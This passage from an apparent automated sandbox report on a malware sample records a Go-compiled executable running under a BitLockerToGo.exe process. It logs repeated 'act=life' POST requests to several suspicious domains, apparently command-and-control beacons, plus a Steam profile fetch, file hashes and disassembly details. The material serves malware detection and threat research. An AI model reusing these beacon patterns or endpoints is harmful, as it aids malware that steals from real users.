2024-10-02 13:11:01 UTC	768	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oo09v66cq9dnqpv4t69umhvg3f; expires=Sun, 26 Jan 2025 06:57:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKeAL1s26R4j%2BAxDMQfb4bdYG47TWeFe1DqDUNqggfxkzCqA2xj9yS5%2BV5qwnsMbqsh4t6k3TsieyjLymH%2B0C531uz%2FZ8IqqLlfvypZdSJXAXj7SQ4t67M5ZfaOUFP6J33Qo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4ef97bcb50fa1-EWR
2024-10-02 13:11:01 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:11:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49721	172.67.183.74	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:11:02 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: snarlypagowo.site
2024-10-02 13:11:02 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:11:02 UTC	774	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j0blegr6b6v5r8evbhp1c7nqs7; expires=Sun, 26 Jan 2025 06:57:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WGjUC14bdRDyHJvaHDczZCeUsx2QRtxinj9Xq7sqcLcFEOmmDt6KbqYDNtBNOgK6sNt6K2kpmmeh5RJJcgeffMWxQwqANM%2FVyI%2F1bBx8hSsYMMACq9bQBVmm8qjAmeR%2BW3nHnw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4ef9e6c8b1977-EWR
2024-10-02 13:11:02 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:11:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	104.21.21.3	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:11:03 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mysterisop.site
2024-10-02 13:11:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:11:03 UTC	772	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=udt5tmahivlmnaphidv7itfh8o; expires=Sun, 26 Jan 2025 06:57:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OaIhUxno9UlmRDrlu8%2F0lclQsUU6RiqWQtQccbiH9%2FZUX%2FSQbXhceOkF46kZNRZ5sUP%2Fbofds0RB7q4ZxiUNYlwxBMQjp5meA%2Bj4GnMW21Qq78xdgeSFsPS8j6RrWvDZhrM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4efa4aa45424b-EWR
2024-10-02 13:11:03 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:11:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	104.21.17.174	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:11:05 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: absorptioniw.site
2024-10-02 13:11:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:11:05 UTC	772	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:11:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h9smnn91j0jb7dlss6gb8aptru; expires=Sun, 26 Jan 2025 06:57:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EvxTC77mFJEok9yeT2h7qCxJMOoM6bT8j7G0LKZmFZF9DKFTXr0UqvVoWgFegw48A5HzBtmoZmimuu2OvCvyMHpHwa5ujGPm7ODxCT%2FTmmTFE4xghcgg9k6wHcbH%2BlHftarjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4efb2ac6b0fa7-EWR
2024-10-02 13:11:05 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:11:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49724	104.102.49.254	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:11:06 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-02 13:11:06 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 13:11:06 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=75a29d536c4b41a637f9f5c2; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 13:11:06 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 13:11:07 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-02 13:11:07 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-02 13:11:07 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49725	172.67.209.193	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:11:07 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gravvitywio.store
2024-10-02 13:11:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:11:08 UTC	799	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:11:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cbnq3pfsgrldjsn83m13o4t6g2; expires=Sun, 26 Jan 2025 06:57:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUFSheyeUEHEtvxZoZT68knLAL72nZklUFo7uOYOpRpMWbgjdyyLwrx0%2BYHnLGGTyzv1xD1zwwt%2Ba6ewv6j1Hvc0vloK130AuhwO%2BQNO9wvcImSkK%2FgpxRhnrwLqo8mert73Wg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4efc0cd2843a4-EWR
2024-10-02 13:11:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:11:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:10:37
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\klFMCT64RF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\klFMCT64RF.exe"
Imagebase:	0xc60000
File size:	13'356'280 bytes
MD5 hash:	0732FC7323424A121F9AA2A8D7001039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2259734292.0000000002BEC000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:10:48
Start date:	02/10/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xb90000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00C97720 Relevance: 11.4, Strings: 9, Instructions: 189COMMON

Download Yara Rule

Strings

CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w, xrefs: 00C97A1D
runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexcontext: internal error: missing ca, xrefs: 00C979E9
bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125 has no name has no typereflect., xrefs: 00C97967
VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Method index out of rangereflect: Field of non-, xrefs: 00C979C2
runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: NumField of non-struct type r, xrefs: 00C97A78
) @s -> Pn=][}]i) +; )(25[]80]:%T//]), xrefs: 00C9794C
%, xrefs: 00C97A81
runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 00C9798E
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me, xrefs: 00C97A44

Memory Dump Source

Source File: 00000000.00000002.2246180166.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.2246161494.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246465291.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246465291.00000000015D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246465291.00000000015FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246465291.0000000001602000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246465291.000000000160A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246465291.0000000001612000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246465291.000000000163B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247069655.000000000187A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247088655.000000000187B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247110367.000000000187E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247127005.000000000187F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247146686.0000000001880000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247159759.0000000001881000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247175781.0000000001882000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247204846.00000000018C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247218811.00000000018D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247608947.00000000018D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247608947.00000000018DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247608947.0000000001914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247608947.0000000001918000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247835320.000000000191D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247868424.000000000191E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247868424.0000000001958000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_klFMCT64RF.jbxd

Similarity

API ID:
String ID: %$) @s -> Pn=][}]i) +; )(25[]80]:%T//])$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Method index out of rangereflect: Field of non-$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125 has no name has no typereflect.$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: NumField of non-struct type r$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexcontext: internal error: missing ca$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
API String ID: 0-2258182149
Opcode ID: b832827e990dc62cb9886a03e3466d9fe629dcb7d71d1b5584b5ba296df4cc93
Instruction ID: b5c9390b2b3193bf104151b27468c2290eae66bae0b2c46f9c2c7d7ce78b12bb
Opcode Fuzzy Hash: b832827e990dc62cb9886a03e3466d9fe629dcb7d71d1b5584b5ba296df4cc93
Instruction Fuzzy Hash: 1C91D1B45097018FD710EF68C199B1ABBF4BF89704F418A2DE49887382DB75D984EF92

Analysis Process: BitLockerToGo.exePID: 4396, Parent PID: 6544COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.2%
Total number of Nodes:	54
Total number of Limit Nodes:	7

Executed Functions

Function 0044A2A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0044DF0E,005C003F,00000006,?,?,00000018,?,?,?), ref: 0044A2CE

Strings

7654, xrefs: 0044A2A4
7654, xrefs: 0044A2C2

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: 7654$7654
API String ID: 2994545307-1888865020
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 004100A0 Relevance: 4.2, Strings: 3, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

'w&q, xrefs: 004101BF
)oNi, xrefs: 004101D3
&s"m, xrefs: 004101C9

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: &s"m$'w&q$)oNi
API String ID: 0-380476458
Opcode ID: e8dd046fdce90d3f35a09ce2e01e5f38e26405ccf4538ce1a3a3488a2070253f
Instruction ID: 5c34db6c64a201bc2a46365f8f7569706269e70db618eb5df5f1091ac69256d9
Opcode Fuzzy Hash: e8dd046fdce90d3f35a09ce2e01e5f38e26405ccf4538ce1a3a3488a2070253f
Instruction Fuzzy Hash: 7B0222B0100B01DFD3208F25D885B9BBBF5FB45715F108A2DE5AA8BA91C778B885CF94

Function 0044DD80 Relevance: 2.6, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0044DE4A
7654, xrefs: 0044DE93, 0044DE9B

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 7654$@
API String ID: 0-3850321529
Opcode ID: 287a7dd298df41a7f0d5c7c9911ffa703591fefdea5f392ba86501987425157d
Instruction ID: d9275e1cc1e830a2bea9acf8f85278569d283bb3c6cd696bf36a71d4502cdca6
Opcode Fuzzy Hash: 287a7dd298df41a7f0d5c7c9911ffa703591fefdea5f392ba86501987425157d
Instruction Fuzzy Hash: 2E41E0B1A083009BE710DF58D841A2BB7E5FF95318F15492EE585CB361E379D904CB96

Function 0040CC90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040CCA1
GetCurrentThreadId.KERNEL32 ref: 0040CCB6
GetCurrentProcessId.KERNEL32 ref: 0040CCBC
ExitProcess.KERNEL32 ref: 0040CE80

Strings

iINO, xrefs: 0040CD93, 0040CD9B

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: iINO
API String ID: 1029096631-2428038992
Opcode ID: dc57d534428a7dc61628010a2af3bf3b4a17bfec567ef5e5d3e6ccd26d9021ae
Instruction ID: 9ab165bf9689c2c627110283d369497d39995192898acbac978fe78d0f29f3dc
Opcode Fuzzy Hash: dc57d534428a7dc61628010a2af3bf3b4a17bfec567ef5e5d3e6ccd26d9021ae
Instruction Fuzzy Hash: A641167040C240DBD701BB69D584A1EFBE5EF56705F148E2EE5C4A7292C73AC8548B6B

Function 0044987B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 004498EC

Strings

mv, xrefs: 0044988A

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: mv
API String ID: 1029625771-3800613987
Opcode ID: 1399059a22d027d244c235eb7103b2bf4a4f5b080061db4c7ef5cf4129da024d
Instruction ID: f66571e49195c2e1e1b2fb703df30d926b430d1c1998e6ba61b145830074cac8
Opcode Fuzzy Hash: 1399059a22d027d244c235eb7103b2bf4a4f5b080061db4c7ef5cf4129da024d
